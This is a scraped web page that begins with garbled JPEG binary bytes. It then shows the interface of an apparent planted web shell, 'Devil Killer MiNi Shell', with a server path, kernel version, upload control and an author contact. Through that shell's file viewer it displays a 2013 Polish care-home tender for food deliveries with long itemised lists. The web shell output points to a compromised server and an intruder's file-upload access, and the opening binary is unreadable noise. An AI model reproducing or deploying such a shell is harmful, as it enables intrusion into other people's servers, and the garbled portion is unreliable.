JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131205/501500-N-2013.html

<p class="kh_header"><b>Wierzbica: dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 501500 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Sienkiewicza 37, 26-680 Wierzbica, woj. mazowieckie, tel. 048 6182059, faks 048 6182059.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa artykułów spożywczych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca   potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

        Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie  spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 3)

        Weryfikacja  spełnienia wyżej wymienionego warunku dokonana zostanie zgodnie z formułą spełnia - nie  spełnia w oparciu o złożone oświadczenie. Prawidłowo złożony dokument - spełnia, brak dokumentu, bądź błędnie złożony - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wykazu posiadanych do wykonania zamówienia środków transportu spełniającego wymogi sanitarne dotyczące środków transportu żywności (dokumenty poświadczone przez sanepid, bądź decyzje wydane przez ten organ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswierzbica.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ, UL. SIENKIEWICZA 37 26-680 WIERZBICA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2013 godzina 11:00, miejsce: DOM POMOCY SPOŁECZNEJ, UL. SIENKIEWICZA 37 26-680 WIERZBICA
D<IA ADMIN.GOSP..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa artykułu	Jedn. miary	Ilość	Cena netto	Wartość netto	VAT
(%)	Wartość VAT	Wartość brutto

1.	
Baleron	
kg	
10					

2.	
Baleron mielony	
kg	
230					

3.	
Baton drobiowy szynkowy	
kg	
285					

4.	
Blok zapiekany	
kg	
188					

5.	
Boczek mielony (wędlina)	
kg	
225					

6.	
Farsz na pierogi	
kg	
25					

7	
Karkówka z kością	
kg	
450					

8.	
Kaszanka	
kg	
250					

9	
Kiełbasa krakowska	
kg	
206					

10.	
Kiełbasa szynkowa	
kg	
225					

11.	
Kiełbasa toruńska	
kg	
275					

12.	
Kiełbasa wiejska	
kg	
5					

13.	
Kiełbasa zwykła	
kg	
421					

14.	
Kiełbasa gilowa	
kg	
193					

15.	
Kiełbasa serwolatka	
kg	
150					

16.	
Kości wieprzowe (rurkowe)	
kg	
1 100					

17.	
Kurczaki	
kg	
890					

18.	
Łopatka z kością	
kg	
900					

19.	
Mielonka wieprzowa (wędlina na kanapki)	
kg	
180					

20	
Mięso mielone (wieprzowe)	
kg	
206	-				

21.	
Mortadel	
kg	
218					

22.	
Ogonówka wędzona	
kg	
17					

23.	
Parówki	
kg	
250					

24.	
Parówkowa	
kg	
250					

25.	
Pasztet drobiowy	
kg	
150					

26.	
Pasztet wieprzowy	
kg	
110					

27.	
Pasztetowa	
kg	
225					

28.	
Pieczeń rzymska	
kg	
200					

29.	
Płuca wieprzowe	
kg	
125					

30.	
Polędwica drobiowa	
kg	
165					

31.	
Salceson włoski	
kg	
112					

32.	
Serca drobiowe	
kg	
38					

33.	
Słonina	
kg	
56					

34.	
Smalec	
kg	
50					

35.	
Szynka wieprzowa (wędlina)	
kg	
9					

36.	
Szynka drobiowa	
kg	
240					

37.	
Wątróbka 	
kg	
270					

38.	
Wołowina z kością - rozbrat	
kg	
78					

39.	
Żebra wieprzowe	
kg	
245					

40.	
Kiełbasa żywiecka	
kg	
232					

41. 	
Serca wieprzowe	
kg	
190			
		

42	
Żołądki drobiowe	
kg	
160					
						
X.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Barszcz biały w proszku opakowanie 66 g	
szt	 
920					

2.	
Budyń (op. 40 g)	
szt	
1000					

3.	
Bułka tarta 	
kg	
200					

4.	
Chrzan w słoiku (op. 290g)	
szt	
380					

5.	
Cukier 	
kg	
2 500					

6.	
Cukier puder	
kg	
12					

7.	
Cukier waniliowy (op. 32g)	
szt	
180					

8	
Cynamon (op. 20g)	
szt	
15					

9.	
Ćwikła (słoik 250 g)	
szt	
22					

10.	
Drożdże (op. 100 g)	
szt	
20					

11.	
Dżem niskosłodzony (op.260 g)	
szt	
450					

12.	
Galaretka owocowa (op. 75 g)	
szt	
20					

13.	Groszek konserwowy (puszka lub słoik 400g)	
szt	
240					

14.	
Herbata (granulat op. 100g)	
szt	
1 100					

15.	
Kakao (op. 100 g)	
szt	
75					

16.	
Kasza gryczana 	
kg	
80					

17.	
Kasza jęczmienna 	
kg	
150					

18.	
Kasza manna	
kg	
200					
19.	Kawa zbożowa rozpuszczalna (op.250 g)	
szt	
140					


20.	
Ketchup (op 1 litr)	
szt	
330					

21	
Kisiel (op. 40g)	
szt	
1200					

22.	
Koncentrat pomidorowy (op. 0,9 l)	szt	
295					

23.	
Krem do ciast (op. 250g)	
szt	
10					

24.	
Kwasek cytrynowy (op. 25g)	
szt	
450					

25.	Liście laurowe (op. 10g)	
szt	
40					

26.	Majeranek (op. 10g)	
szt	
110					

27.	Majonez (op. 1l)	
szt	
300					

28.	Mak (op. 1 kg)	
szt	
10					

29.	Makaron świderki (op. 5 kg)	
szt	
68					

30.	Makaron nitki (op. 5kg)	
szt	
44					

31.	Margaryna	
kg	
20					

32.	Mąka pszenna (op. 5kg)	
szt	
160					

33.	Mąka ziemniaczana (op. 1 kg)	
kg	
200					

34.	Miód naturalny (op. 1 l)	
szt	
50					

35.	Musztarda (op. 1 l)	
szt	
133					

36.	Ocet (op. 1l)	
szt	
10					

37.	Olej uniwersalny (op. 5 l)	
szt	
100					

38.	Olejek do ciast  (op. 10g)	
szt	
20					

39.	Pieprz mielony (op. 15g)	
szt	
550					

40.	Płatki jęczmienne (op. 400g)	
szt	
280					

41.	
Płatki kukurydziane 1 kg	
kg	
700					

42.	
Płatki owsiane 	
kg	
130					

43.	
Polewa czekoladowa (op. 100g)	
szt	
10					

44.	
Proszek do pieczenia (op. 30g)	
szt	
100					

45. 	
Przyprawa warzywna (op. 1 kg) 	
szt	
90					

46.	Przyprawa do potraw w płynie (op. 1 l)	
szt	
20					
47.	Rodzynki (op. 1kg)	szt	2
					

48.	
Ryż 	
kg	
430					

49.	
Sok owocowo-warzywny zagęszczany w butelce  (op. 1 l)	

szt	

1000					

50.	
Sól 	
kg	
420					

51.	
Syrop owocowy wysokosłodzony (op. 0,50l) 	

szt	

1800					

52.	
Ziele angielskie (op. 15 g)	
szt	
50					

53. 	
Zioła prowansalskie (op 10g)	
szt 	
50					

54. 	
Żelatyna (op 50g)	
szt	
30					

55.	
Bazylia  (op. 10g)	
szt	
					

56.	
Tymianek (op 10g)	
szt	
50					

57	
Oregano (op. 10g)	
szt	
50					

58.	
Przyprawa do kurczaka (op.20g)	
szt	
80					

59. 	
Przyprawa do wieprzowiny (20g)	
szt	
50					

60.	
Przyprawa do wołowiny (op. 20g)	
szt	
50					

61.	
Gałka muszkatołowa (op.10g)	
szt.	
50					

62.	
Papryka słodka (op.20g)	
szt	
50					

63.	
Papryka ostra (op20g)	
szt	
50					

64.	
Pieprz ziołowy (20g)	
szt	
50					

65.	
Curry (op. 25g)	
szt	
50					

66	
Wafle śmietankowe (180 g)	
szt	
60					

67.	
Herbatniki (65 g)	
szt	
60					

68.	
Biszkopty (100g)	
szt	
60					

69.	
Paluszki ( 80g)	
szt	
60					

70.	
Baton MARS (op. 47 g)	
szt	
75					
					
	
X.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Mleko 2 %	
litr	  
25 000

2.	
Ser biały półtłusty	
kg	
740

3.	
Ser twardy	
kg	
275

4.	
Serek homogenizowany (op. 150g)	
szt	
3 100

5.	
Serek topiony (op. 100g) 	
szt	
2 650

6.	
Śmietana 18% (op. 400g)	
szt	
2 350

7.	
Masło extra kostka 200g	
szt	
6 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pieczywo świeże i wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Bułka pszenna (50g)	
szt	
22 000

2.	
Bułka pszenna (400g) (gryzka)	
szt	
5 500

3.	
Chleb pszenno-żytni - krojony (600 g)	
szt	
14 500


4.	
Chleb graham - krojony (500 g)	
szt	
4 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby przetworzone i konserwowane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Filet z miruny	
kg	
600

2.	
Paprykarz szczeciński (op. 330g)	
szt	
80

3.	
Śledź salinat	
kg	
80

4.	
Śledź w oleju (op. 170g)	
sz	
160

5.	
Śledź w pomidorach (op.170g)	
szt	
250

6.	
Szprot w oleju (op.170g)	
szt	
250

7.	
Szprot w pomidorach (op. 170g)	
szt	
280

8.	
Ryba wędzona	
kg	
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Arbuz	
kg	
65

2	
Banany 	
kg	
100

3	
Botwina	
Pęczki	
80

4	
Buraki	
kg	
1 150

5	
Brokuły	
szt	
80

6	
Cebula	
kg	
600

7	
Cytryny	
kg	
           8

8	
Fasola biała	
kg	
100

9	
Fasola szparagowa	kg	
20

10	
Groch łupany	
kg	
80
11
	
Grzyby suszone	
kg	
0,5

12	
Jabłka	
kg	
2 500

13	
Kalafior	
szt	
80
14	
Kapusta biała	
kg	
3 000
15	
Kapusta granatowa	
kg	
500
16	
Kapusta kiszona	
kg	
200
17	
Kapusta pekińska	
kg	
400

18	
Kapusta młoda	
kg	
100

19	
Kapusta włoska	
kg	
600

20	
Koper	
pęczki	
150

21	
Mandarynki	
kg	
30

22	
Marchew	
Kg	
2 400

23	
Ogórek świeży	
Kg	
420

24	
Ogórki kiszone	
Kg	
400

25	
Papryka	
Kg	
40

26	
Pieczarki	
kg	
250

27	
Pietruszka	
kg	
450

28	
Pietruszka  zielona	
pęczki	
70


29	
Pomidory	
kg	450

30	
Por	
kg	110


31	
Porzeczka czarna	
Kg	
150

32	
Rabarbar	
kg	
80

33	
Rzodkiewka	
pęczki	
120

34	
Sałata zielona	
szt	
600

35	
Seler	
kg	
400

36	
Susz  owocowy -  jabłko	
Kg	
2

37	
Susz owocowy- śliwka	
kg	
2

38	
Susz owocowy - gruszka	
Kg	
2

39	
Susz warzywny (5 kg)	
szt	
12

40	
Szczaw	
pęczki	
40
41	
Szczypior	
pęczki	
50
42	
Śliwka	
kg	
150

43	
Truskawka	
kg	
50

44	
Wiśnia	
kg	
150

45	
Ziemniaki	
kg	
16 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com